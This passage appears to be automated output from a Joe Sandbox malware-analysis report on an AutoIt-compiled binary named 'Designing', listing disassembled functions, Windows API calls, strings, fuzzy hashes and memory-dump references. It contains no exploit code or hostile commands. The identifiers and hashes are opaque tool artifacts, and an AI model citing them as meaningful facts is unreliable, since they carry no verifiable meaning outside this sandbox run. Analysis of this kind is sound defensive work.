                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                              • Opcode ID: 7bd56bd8ecfb599571ec37c9e5aac3b2d72c1b7f103012d4f041b56436ae5708
                                                                                                                                                                              • Instruction ID: 09a666669c08cd76a87ca212e6d86e1e657d05ea83441bfe8b25814e8e626e19
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bd56bd8ecfb599571ec37c9e5aac3b2d72c1b7f103012d4f041b56436ae5708
                                                                                                                                                                              • Instruction Fuzzy Hash: 5C01A7B5640104ABCF05E7A0DD66EFE77F8DF56344F50101AB903B32C2DA20DE4986B6
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E02615
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                              • Opcode ID: e2d3902bdf7a9985cd43815909ca761b0dad635ad3f678087df200f17f9af6c9
                                                                                                                                                                              • Instruction ID: aa84baae7d1ff242af46c2ddafe5ded30d67feab1747d6c9fdbac39d7d8e38b1
                                                                                                                                                                              • Opcode Fuzzy Hash: e2d3902bdf7a9985cd43815909ca761b0dad635ad3f678087df200f17f9af6c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01A7B5A40104A7CF15E790ED45EFF77F8DB15344F50201AB903B32C2DA618E4D96B2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E02720
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                              • Opcode ID: d985570dfb188c950e3e24f89c6f8b0cf56d37104c33ace11aa33e211e336f6c
                                                                                                                                                                              • Instruction ID: 7f9b31d0dc8628a22143e058c4f29a6a89f1ac727598fdec3559853024adc27a
                                                                                                                                                                              • Opcode Fuzzy Hash: d985570dfb188c950e3e24f89c6f8b0cf56d37104c33ace11aa33e211e336f6c
                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F4B5A40214ABCF04A3A49C55FFE77B8EF12394F44291BF523B32C2DB61980D8271
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00E39B6D
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E39B53
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$MessageProcSend
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 982171247-2063206799
                                                                                                                                                                              • Opcode ID: cf1a4e5f4aceb74d42aa2a3d182b6fb53a53507bcf7578542ab35d8fda67a752
                                                                                                                                                                              • Instruction ID: 0d64d16c987b202569344cf130366b171de2bb654f199b528b18e4acf97bcc3a
                                                                                                                                                                              • Opcode Fuzzy Hash: cf1a4e5f4aceb74d42aa2a3d182b6fb53a53507bcf7578542ab35d8fda67a752
                                                                                                                                                                              • Instruction Fuzzy Hash: 8001D430104214AFDB259F15EC48F66BF76FF85368F100559FA162A1E1C7B26845DB64
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E38471
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E3847F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 1378638983-2063206799
                                                                                                                                                                              • Opcode ID: cc790321075a6b06f483a6c48cd4c32b3a303db686e7007771abd5a6c4bf300e
                                                                                                                                                                              • Instruction ID: ba83d4dd8c76589e63318642fdb91026b9b492e911ccb4a72dc1868ff093f036
                                                                                                                                                                              • Opcode Fuzzy Hash: cc790321075a6b06f483a6c48cd4c32b3a303db686e7007771abd5a6c4bf300e
                                                                                                                                                                              • Instruction Fuzzy Hash: B9F04F315052459FC704DF69DC48D6A7BB5EB8A324B15462DFA3AA77F0CB309845DB10
                                                                                                                                                                              APIs
                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E0146F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message
                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                              • API String ID: 2030045667-4017498283
                                                                                                                                                                              • Opcode ID: 71565e023cf5b3f6bf116c655596480e3e75ae6d2f9ede6e131b341c5615b196
                                                                                                                                                                              • Instruction ID: 7c1e44aef3e6d0446596f2147fbf19c0a6c99e0c2091b646426b7c98a12827c7
                                                                                                                                                                              • Opcode Fuzzy Hash: 71565e023cf5b3f6bf116c655596480e3e75ae6d2f9ede6e131b341c5615b196
                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE0D8312887193AD6102794BC07FC4BF88CF05B51F15441EFB58B54C24EE2249082B9
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DBFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DC10E2,?,?,?,00DA100A), ref: 00DBFAD9
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00DA100A), ref: 00DC10E6
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DA100A), ref: 00DC10F5
                                                                                                                                                                              Strings
                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DC10F0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                              • API String ID: 55579361-631824599
                                                                                                                                                                              • Opcode ID: f7b99adf2d1ac8496ae158e8a59957ec80b0e35f84ea4879f975ebb7e18d1119
                                                                                                                                                                              • Instruction ID: 75e9e135ccab927724bbbb61487a1521407719a02f7e04afb8088d31c103b948
                                                                                                                                                                              • Opcode Fuzzy Hash: f7b99adf2d1ac8496ae158e8a59957ec80b0e35f84ea4879f975ebb7e18d1119
                                                                                                                                                                              • Instruction Fuzzy Hash: 28E06D746003228FD3209F26E809742BFE4EB01300F04892CE986D3252DBB8D488CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DBF151
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: `5$h5
                                                                                                                                                                              • API String ID: 1385522511-2563461917
                                                                                                                                                                              • Opcode ID: bd040e859b5f00377105c21e7c9817dc37224080a395065b6a55325da63c9870
                                                                                                                                                                              • Instruction ID: 769d9aebe2c415c4a0af2ca2c89b148c9c4fb907c0e253db0f0fa38a7c2e1652
                                                                                                                                                                              • Opcode Fuzzy Hash: bd040e859b5f00377105c21e7c9817dc37224080a395065b6a55325da63c9870
                                                                                                                                                                              • Instruction Fuzzy Hash: 10E02631404A14DFC640D73CEC02EC83364EB44B20B300579E10BA72918B302A82EB35
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E139F0
                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E13A05
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                              • String ID: aut
                                                                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                                                                              • Opcode ID: c39642dd8a1dbca6beb31b32e7453c896c5d203703202a5efb14500e4c6f792c
                                                                                                                                                                              • Instruction ID: 5f25f8329fef70b5ee956b3726638aa3b0abc81070d1e4aee203b840dc71b5f0
                                                                                                                                                                              • Opcode Fuzzy Hash: c39642dd8a1dbca6beb31b32e7453c896c5d203703202a5efb14500e4c6f792c
                                                                                                                                                                              • Instruction Fuzzy Hash: 69D05B71544318ABDA209765AC0DFCB7E7CDB44750F000191BA95A10A1DAB0D549C790
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E32E08
                                                                                                                                                                              • PostMessageW.USER32(00000000), ref: 00E32E0F
                                                                                                                                                                                • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              • Opcode ID: 3ff45ba4f8268917ec66a8e55186d98a2825e1485ac0d9aa9dca40f672b32d84
                                                                                                                                                                              • Instruction ID: eb19e22f9585a6be732160fb871cf697dbec1b62149d66bd7e15c57a01f19fc5
                                                                                                                                                                              • Opcode Fuzzy Hash: 3ff45ba4f8268917ec66a8e55186d98a2825e1485ac0d9aa9dca40f672b32d84
                                                                                                                                                                              • Instruction Fuzzy Hash: AED0A9313C9304BBE224A330BC0FFC22A549B50B10F100821B245BA0D0C8A068008684
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E32DC8
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E32DDB
                                                                                                                                                                                • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              • Opcode ID: 3e1227118dec3ed44c7fb270f98697060c1377a6cd3f0f0baef7bf9a6a231e24
                                                                                                                                                                              • Instruction ID: 1af51340daab00d4393716eb51fc208afac7a9517bac238fa556c5961b4519cb
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e1227118dec3ed44c7fb270f98697060c1377a6cd3f0f0baef7bf9a6a231e24
                                                                                                                                                                              • Instruction Fuzzy Hash: CAD0A935388304BBE224A330BC0FFD22E549B50B10F100821B249BA0D0C8A068008680
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DDC213
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DDC221
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DDC27C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                              • Opcode ID: 50675d12932c0937e3cbcc0b8fc5c8161374cce11e4ca4535f3f138fd181450c
                                                                                                                                                                              • Instruction ID: b4a990cccddef39794d1e04011502c2bf067d4b754e6062fba050b9a4a080eb8
                                                                                                                                                                              • Opcode Fuzzy Hash: 50675d12932c0937e3cbcc0b8fc5c8161374cce11e4ca4535f3f138fd181450c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0141E730651207AFDB219FE5C844BBA7FA5EF11710F28516AF855A73A1EB308C01C7B4